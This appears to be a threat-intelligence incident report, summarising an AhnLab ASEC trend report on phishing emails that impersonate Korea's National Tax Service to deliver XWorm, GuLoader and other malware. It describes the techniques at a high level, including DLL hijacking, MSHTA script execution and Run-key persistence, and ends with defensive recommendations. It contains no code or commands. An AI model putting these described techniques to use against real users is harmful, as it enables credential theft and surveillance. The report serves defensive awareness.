Full Report
There is a noticeable increase in phishing emails impersonating the National Tax Service (NTS) whenever it is time to file value-added tax (VAT) and other taxes. AhnLab SEcurity intelligence Center (ASEC) has been alerting users to this threat by distributing relevant content. Phishing cases impersonating the National Tax Service have been ongoing for several […] 게시물 Trend Report on Phishing Malware Impersonating the National Tax Service (NTS)이 ASEC에 처음 등장했습니다.
Analysis Summary
# Incident Report: Escalated NTS Phishing Campaign Delivering XWorm and Various Malware
## Executive Summary
A significant increase in sophisticated phishing campaigns impersonating the National Tax Service (NTS) has been observed, particularly around tax filing periods. Threat actors are leveraging diverse file formats (HTML, VBS, PPT, DLL, SCR, EXE, LNK, CHM) to deliver malware, including downloaders like GuLoader and infostealers such as XWorm. The impact revolves around credential theft, system compromise, and potential data exfiltration, necessitating heightened user caution, especially during high-stakes regulatory periods.
## Incident Details
- **Discovery Date:** Ongoing monitoring leading up to December 03, 2024 (Report Date)
- **Incident Date:** Trend identified as significantly increased in 2024.
- **Affected Organization:** General users/businesses interacting with the National Tax Service (NTS).
- **Sector:** Government Services/Taxation (Target of Impersonation).
- **Geography:** Not explicitly stated, but implies regions served by the NTS.
## Timeline of Events
### Initial Access
- **Date/Time:** Varies, coinciding with VAT and other tax filing periods.
- **Vector:** Email Phishing.
- **Details:** Emails impersonate the NTS, using manipulated sender addresses. Delivery mechanisms include email attachments or hyperlinks leading to malware hosting sites.
### Lateral Movement
- **Details:** Specific lateral movement techniques are not detailed for all vectors, but malware like XWorm (found in one specific DLL vector) is capable of system monitoring and information theft, implying post-compromise activity. Persistence is achieved via registry modification (Run key registration).
### Data Exfiltration/Impact
- **Details:** Malware observed focuses on credential leakage (HTML/Script files), system information theft, keylogging, and webcam monitoring (XWorm via DLL hijacking vector). Downloaders like GuLoader/Lokibot are used to fetch further payloads.
### Detection & Response
- **Details:** Detection is driven by threat intelligence platform AhnLab SEcurity intelligence Center (ASEC) distributing alerts and content regarding the increased trend. Response actions mentioned are primarily educational/advisory dissemination regarding cautious handling of NTS-related communications.
## Attack Methodology
- **Initial Access:** Phishing emails using manipulated sender addresses, delivered via attachments (e.g., ZIP containing DLL/EXE) or links (leading to C2/malware host).
- **Persistence:** Identified in CHM vector via registering entries in the Run registry key.
- **Privilege Escalation:** Not explicitly detailed, though execution of downloaded payloads suggests elevation may occur post-initial execution.
- **Defense Evasion:** Use of legitimate-looking files disguised with NTS-related keywords and icons (e.g., `Haihaisoft PDF Reader.exe` alongside malicious DLL), and leveraging native Windows processes like `MSHTA.exe` (CHM vector) to execute scripts.
- **Credential Access:** Direct credential leakage to C2 (HTML/Script vector) and keylogging capabilities (XWorm).
- **Discovery:** Implied—XWorm is capable of stealing system information.
- **Lateral Movement:** Not explicitly detailed beyond internal system activities (e.g., persistence setup).
- **Collection:** System information, user accounts, keystrokes, webcam data (XWorm).
- **Exfiltration:** Leakage of user account credentials to C2 server.
- **Impact:** System compromise leading to surveillance and potential data theft.
## Impact Assessment
- **Financial:** Not quantified, but implied costs associated with remediation and potential regulatory fines if PII/financial data is breached.
- **Data Breach:** User account credentials, system information, keystrokes, and potentially webcam feeds are at risk due to payloads like XWorm.
- **Operational:** Potential disruption depending on the prevalence and type of malware deployed (e.g., ransomware deployment if used as the final payload after initial downloaders).
- **Reputational:** Potential damage to the public trust in the security of NTS communications, especially during critical filing times.
## Indicators of Compromise
*(Note: Indicators provided in the article are technical samples and hashes, not defanged network/file IoCs suitable for this section without further analysis. The following reflects the types of malicious artifacts observed.)*
- **Network indicators:** C2 servers accessed via malicious scripts executed by MSHTA (specific URLs defanged if known).
- **File indicators:** Malicious binaries disguised under various extensions: .html (script), .vbs, .pptx, .dll, .scr, .exe, .lnk, .chm. Specific example: DLL file `msimg32.dll` used in hijacking.
- **Behavioral indicators:** Use of PowerShell commands (e.g., Guloader execution), DLL hijacking, creation/execution of BAT/VBS scripts, use of MSHTA to execute remote scripts, Run registry key modification.
## Response Actions
- **Containment:** Not detailed for a specific victim, but the primary containment strategy implied is user awareness and blocking delivery vectors.
- **Eradication:** Wiping infected systems and removing persistence mechanisms (Run keys).
- **Recovery:** Restoring systems from clean backups and resetting compromised credentials.
## Lessons Learned
- Threat actors are highly adaptive, leveraging a wide range of file formats (8 identified) to bypass static defenses, exploiting social engineering themes relevant to the immediate time period (tax season).
- Sophisticated techniques like DLL hijacking (using recognizable legitimate application names/icons) are employed to execute remote code execution and deploy advanced malware like XWorm.
- The reliance on social engineering topics that generate urgency (tax payments) remains a highly effective infection vector.
## Recommendations
- **Multi-Factor Authentication (MFA):** Mandate MFA for all critical services, especially those related to tax filings or financial accounts, to mitigate the risk of stolen credentials.
- **Application Control/Whitelisting:** Implement strict policies to limit the execution of scripts via native interpreters like MSHTA and PowerShell unless explicitly required for business processes.
- **File Type Restrictions:** Block high-risk attachment types (e.g., LNK, SCR, HTML) at the email gateway, or sandbox execution of these files.
- **User Training:** Conduct targeted, timely training emphasizing the signs of NTS impersonation, especially coinciding with tax deadlines.
- **Patching and Hardening:** Ensure systems are hardened against known malware attack paths; analyze DLL hijacking risks on endpoints.